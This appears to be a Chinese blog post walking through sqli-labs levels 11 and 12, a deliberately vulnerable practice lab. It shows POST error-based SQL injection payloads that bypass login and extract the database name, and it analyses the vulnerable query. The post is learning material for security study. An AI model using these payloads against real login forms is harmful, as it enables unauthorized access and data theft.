Sqli-labs Less11-12 基于错误的sql注入 - POST

本文记录 SQL 注入的学习过程,资料为 SQLi

SQLi 博客目录

Less - 11: POST - Error Based - Single Quotes - String

  1. 测试漏洞

     在 username 中输入 admin'--+
     在 password 中输入任意内容
    

    显示错误信息

     You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'aaa' LIMIT 0,1' at line 1
    

    结果显示是对 ’ 的处理产生的错误

    尝试使用万能密码

     在 username 中输入 admin' or '1'='1
     在 password 中输入任意内容
    

    返回的正确的结果

  2. 源代码分析

     @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
    
     # 变成了:
     
     @$sql="SELECT username, password FROM users WHERE username='admin'or'1'='1' and password='$passwd' LIMIT 0,1";
    

    前面的内容因为 or 1=1 恒成立,所以语句就成立,我们此时以 admin 的用户登录。那么接下来我们尝试用 get 注入中用到的其他的语句代替 or 1=1 进行注入。

    这里我们用 union 注入进行尝试:

     username:1'union select 1,database()#
     passwd=1(任意密码)
    

    可以看到显示了database 为security,这是我们比较常用的手法。
    还可以利用其他的方法进行注入。上述在get 型注入中提到的语句都可以使用。

    当然了,还可以利用其他的方法进行注入,我们在后面的几个关卡中会给出示例的payload。

Less - 12: POST - Error based - Double Quotes - with twist##

  1. 测试漏洞

     在 username 中输入 admin"
     在 password 中输入任意内容
    

    显示错误信息

     You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ddd") LIMIT 0,1' at line 1
    

    我们可以得知这里的id 进行了(“id”)的处理,所以我们依旧可以用万能密码进行尝试。

     在 username 中输入 admin")#
     在 password 中输入任意内容
    

     在 username 中输入 admin") or 1=1#
     在 password 中输入任意内容
    

    用admin ")or 1=1# 方式登录的话,居然是Dumb 登录,这里解释一下为什么不是admin 登录。其实是因为sql 执行的优先级的问题。

  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值